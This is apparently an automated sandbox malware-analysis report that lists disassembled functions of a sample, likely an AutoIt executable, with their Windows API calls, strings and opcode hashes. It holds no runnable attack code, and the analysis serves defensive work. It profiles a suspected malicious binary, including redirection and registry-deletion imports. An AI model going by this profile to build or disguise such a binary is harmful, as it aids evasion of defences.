                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 3850602802-4076565667
                                                    • Opcode ID: 1796a525cd72ca4b77d621811496d92f7e922448ee9a49a94b3cc376ef6b49f5
                                                    • Instruction ID: 2f8540f2ec66b39dbf799d7b2aa9db7cc723828bd9bbfc95a5da5ad1b9b36736
                                                    • Opcode Fuzzy Hash: 1796a525cd72ca4b77d621811496d92f7e922448ee9a49a94b3cc376ef6b49f5
                                                    • Instruction Fuzzy Hash: D421B775A0020AEFCB55DF98D845CEA7BB6FB4D350B008199FD06A7360DA31ED61DB90
                                                    Function 0066092D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00653C14,007152F8,?,?,?), ref: 0066096E
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • _wcscat.LIBCMT ref: 00694CB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_memmove_wcscat
                                                    • String ID: p*$Sq
                                                    • API String ID: 257928180-1855700939
                                                    • Opcode ID: 16b757c3a7d354d10a60b43ceabac5757bdb0eb5751eefffe469ce7d28a0567c
                                                    • Instruction ID: 0591fa55da7321ef42a19693ff1751a97a25ad6eaeb275c2fc94cb46f4c8abea
                                                    • Opcode Fuzzy Hash: 16b757c3a7d354d10a60b43ceabac5757bdb0eb5751eefffe469ce7d28a0567c
                                                    • Instruction Fuzzy Hash: B811A5309052099B9B84FB64D805EDE73BBEF08355F0055BAF959D7281EAB097884714
                                                    Function 006A8E05 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006A8E73
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 372448540-2258501812
                                                    • Opcode ID: e0482e4cdbde187eaf4f3ebe4bd87aaee1953149801f8311fbe078625f1ce5e5
                                                    • Instruction ID: bd5632f11881bdee93cb34ef10b16f59cef8c6feade0f0512178e3dc5c0736fd
                                                    • Opcode Fuzzy Hash: e0482e4cdbde187eaf4f3ebe4bd87aaee1953149801f8311fbe078625f1ce5e5
                                                    • Instruction Fuzzy Hash: AB019EB1A01219EBCB14BBA4CC558FE77AABF06320F144A1ABC22572E1DE365C0CCA50
                                                    Function 006A8CFD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 006A8D6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 372448540-2258501812
                                                    • Opcode ID: 855b9b3dc684a7e9301a7071bb2465fe9cb6dc2ab554b1af278cd8be7997bd28
                                                    • Instruction ID: bfea7bdda8899dbcf37a840a868b628c2086b26670f32dc83e09d82503390256
                                                    • Opcode Fuzzy Hash: 855b9b3dc684a7e9301a7071bb2465fe9cb6dc2ab554b1af278cd8be7997bd28
                                                    • Instruction Fuzzy Hash: 1501F2B1A41109ABCB14FBE0C956EFEB3AADF16300F10412EBC02672E1DE255E0CDA75
                                                    Function 006A8D82 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 006A8DEE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 372448540-2258501812
                                                    • Opcode ID: 086a3fbe9db39a7edcb6ab986dbcb9c57280129137eab59d8d7255333dca990b
                                                    • Instruction ID: 7ce4a200f1ac9a10a06fe80ee7b66dfcc726fd4b87d9a1f214ea25873620fdf7
                                                    • Opcode Fuzzy Hash: 086a3fbe9db39a7edcb6ab986dbcb9c57280129137eab59d8d7255333dca990b
                                                    • Instruction Fuzzy Hash: 2801F7B1A41109ABCB14F7A4C956AFE77AA8F12300F10411ABC02672D2DE155E0CD675
                                                    Function 006DC57D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0068B93A,?,?,?), ref: 006DC5F1
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 006DC5D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageProcSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 982171247-4076565667
                                                    • Opcode ID: 0619542d446a66e7a63c186c57cd1230e8803f151d4559d869ebf622a6d165ea
                                                    • Instruction ID: 607dc3b82ca3e0d76aadd8519962b76d893d9aea12025b80d55110ce97d66031
                                                    • Opcode Fuzzy Hash: 0619542d446a66e7a63c186c57cd1230e8803f151d4559d869ebf622a6d165ea
                                                    • Instruction Fuzzy Hash: 4401B531601209EFCB255F18EC54EAA3BA7FB85370F14452AF9511B3E0CB31A952DB50
                                                    Function 00676B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: p$@Bq
                                                    • API String ID: 3494438863-221554537
                                                    • Opcode ID: 9a500c5f9e0186919670cef9017091fc60a6e1ac7297aed73ffb4e86fe61441d
                                                    • Instruction ID: 014c3aacf6b0450a426583a4fb6705b477c260fde9ab026f08c1bbdeb58fb4be
                                                    • Opcode Fuzzy Hash: 9a500c5f9e0186919670cef9017091fc60a6e1ac7297aed73ffb4e86fe61441d
                                                    • Instruction Fuzzy Hash: 69F044B2244E12CBE76C8F58FC51AD62796F781B30B60C52AF109CF2D0EB78885146D8
                                                    Function 00666063 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0066603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00666051
                                                    • SendMessageW.USER32(?,0000000C,00000000,?), ref: 0066607F
                                                    • GetParent.USER32(?), ref: 006A0D46
                                                    • InvalidateRect.USER32(00000000,?,00663A4F,?,00000000,00000001), ref: 006A0D4D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$InvalidateParentRectTimeout
                                                    • String ID: @U=u
                                                    • API String ID: 3648793173-2594219639
                                                    • Opcode ID: ccbef7547462ded884948fe8cfa57825824dd7a1b13b3d613255ec2804d3a5a2
                                                    • Instruction ID: 3117717f12675e8f56f4991c06552c5e4420029dbdba0c8c6bd7748932b0f486
                                                    • Opcode Fuzzy Hash: ccbef7547462ded884948fe8cfa57825824dd7a1b13b3d613255ec2804d3a5a2
                                                    • Instruction Fuzzy Hash: FEF0E531500240FBFF202F70EC09FA57B5BAF06348F246439F5419A1B1C6B3AC41AB50
                                                    Function 00654C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00654B83,?), ref: 00654C44
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00654C56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: cbcd041488d466807224a554d5ad34ddb02e54781602999a9b46cd8a9e28584a
                                                    • Instruction ID: 5999dada7165dd8d5a30a4f59c53c7f94a5319fdd8962f979b86ac5d4138dce1
                                                    • Opcode Fuzzy Hash: cbcd041488d466807224a554d5ad34ddb02e54781602999a9b46cd8a9e28584a
                                                    • Instruction Fuzzy Hash: F7D0C730901713CFC7208F31CC0868A73E6AF00346F21883B98A2C62A8EBB0C8C0CA10
                                                    Function 00654C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00654BD0,?,00654DEF,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654C11
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00654C23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: c83b708e8f2d444bc8d55fd60fdb734c634f1b70256575fc726b9e04ee9ea8f3
                                                    • Instruction ID: 65f220ca5d591e248e3364e941475f42b7229c5ee25d9c63c7a90c186263d7de
                                                    • Opcode Fuzzy Hash: c83b708e8f2d444bc8d55fd60fdb734c634f1b70256575fc726b9e04ee9ea8f3
                                                    • Instruction Fuzzy Hash: 2ED08230902713CFC720AB70CC08646BAE7AF09342B01983A9882C22A0EAB0C8808A10
                                                    Function 006D0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,006D1039), ref: 006D0DF5
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006D0E07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: b011c19086c7912b4767ab24ad3bb7adc3b756956f65de5b78b28c2214399542
                                                    • Instruction ID: 4fa01152f5f43e7052efb0252370e550586ce8b5132eb0ac6802dfd2a0e5d6c7
                                                    • Opcode Fuzzy Hash: b011c19086c7912b4767ab24ad3bb7adc3b756956f65de5b78b28c2214399542
                                                    • Instruction Fuzzy Hash: 6DD017B0910723CFE7209F76CC0878A77EAAF04352F159C3F9596D2291EBB4D8A0CA51
                                                    Function 006C90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,006C8CF4,?,006DF910), ref: 006C90EE
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006C9100
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 47d6dedc147fa9bc0f54aee34accafa1cf14414516fdba6ca84fadff5d965391
                                                    • Instruction ID: 6dfb0b4fd13f43322da412fc0167995502d490035d7beff164e59cdb98b1493c
                                                    • Opcode Fuzzy Hash: 47d6dedc147fa9bc0f54aee34accafa1cf14414516fdba6ca84fadff5d965391
                                                    • Instruction Fuzzy Hash: 41D01774910713CFDB209F31DC1DA5676E6AF05391B1A983F9496D6A90EB74D880CAA0
                                                    Function 00691714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 7fdacb3f6b976a193e300d08036f42b095d7b5fd15dd2745add2e8cd287e6586
                                                    • Instruction ID: c3912404aa3b90cd2d3da349c4b769cb8060516ab12c90f6fdcc3a9f5511b717
                                                    • Opcode Fuzzy Hash: 7fdacb3f6b976a193e300d08036f42b095d7b5fd15dd2745add2e8cd287e6586
                                                    • Instruction Fuzzy Hash: 07D012B180511BEACF409BD098888B9737EA70A711F700553B506DA580E2258756E621
                                                    Function 006A717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d6bc68faa4a1b67db2bceff7032deffc85d17dd7dc7f001b4e0a4f5ad4a404b
                                                    • Instruction ID: 52f339b77b7a2a960d59798756d76951793677371405b6a05ffba477d7dce1d7
                                                    • Opcode Fuzzy Hash: 5d6bc68faa4a1b67db2bceff7032deffc85d17dd7dc7f001b4e0a4f5ad4a404b
                                                    • Instruction Fuzzy Hash: D7C14875A04216EFCB14DFA4C884AAEBBF6FF49704B158598E805EB251D730EE81DF90
                                                    Function 006CE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 006CE0BE
                                                    • CharLowerBuffW.USER32(?,?), ref: 006CE101
                                                      • Part of subcall function 006CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006CD7C5
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006CE301
                                                    • _memmove.LIBCMT ref: 006CE314
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: a1c1c46a274b469afd9d881bec58912772a98366b3af2ccbe028deeda0739c35
                                                    • Instruction ID: f884bc48f4fc6a5fc2cc7f100b572f8f4848de5af5f6f0b13923cab944a01984
                                                    • Opcode Fuzzy Hash: a1c1c46a274b469afd9d881bec58912772a98366b3af2ccbe028deeda0739c35
                                                    • Instruction Fuzzy Hash: 73C14771A08301DFC754DF28C480A6ABBE6FF89714F04896EF8999B351D731EA46CB91
                                                    Function 006C8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 006C80C3
                                                    • CoUninitialize.OLE32 ref: 006C80CE
                                                      • Part of subcall function 006AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006AD5D4
                                                    • VariantInit.OLEAUT32(?), ref: 006C80D9
                                                    • VariantClear.OLEAUT32(?), ref: 006C83AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 5023322f7239eaa7080867a255aa63209dbc115a944171455115651d9130922b
                                                    • Instruction ID: d43b6c2a4d2ccff02449165e557bf5eb3e0ee84ccb7fada68881f61ce0d27d46
                                                    • Opcode Fuzzy Hash: 5023322f7239eaa7080867a255aa63209dbc115a944171455115651d9130922b
                                                    • Instruction Fuzzy Hash: 73A122356047019FCB50DF64C885B6AB7E6BF89314F08481DF99A9B3A2CB34ED05CB96
                                                    Function 006A687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
